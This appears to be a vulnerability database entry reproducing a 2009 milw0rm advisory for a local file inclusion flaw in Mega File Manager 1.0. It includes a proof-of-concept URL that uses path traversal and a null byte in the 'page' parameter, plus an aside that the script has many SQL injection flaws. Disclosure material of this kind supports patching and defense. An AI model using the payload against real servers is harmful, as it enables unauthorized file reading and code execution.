header-logo
Suggest Exploit
vendor:
Mega File Manager
by:
SirGod
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Mega File Manager
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:awesomephp:megafilemanager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Mega File Manager 1.0 (index.php page) Local File Inclusion Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input to the 'page' parameter in 'index.php' script. A remote attacker can include a local file from the web server and execute arbitrary code.

Mitigation:

Input validation should be used to prevent the inclusion of local files.
Source

Exploit-DB raw data:

#################################################################################################################
[+] Mega File Manager 1.0 (index.php page) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
#################################################################################################################

[+] Homepage : http://www.awesomephp.com/?MegaFileManager

[+] Note : The script is full of SQL Injection vulns,but I am tired to
make querys now.

[+] Local File Inclusion

    http://127.0.0.1/[path]/index.php?page=../../../../../../BOOTSECT.BAK%00

#################################################################################################################

# milw0rm.com [2009-06-26]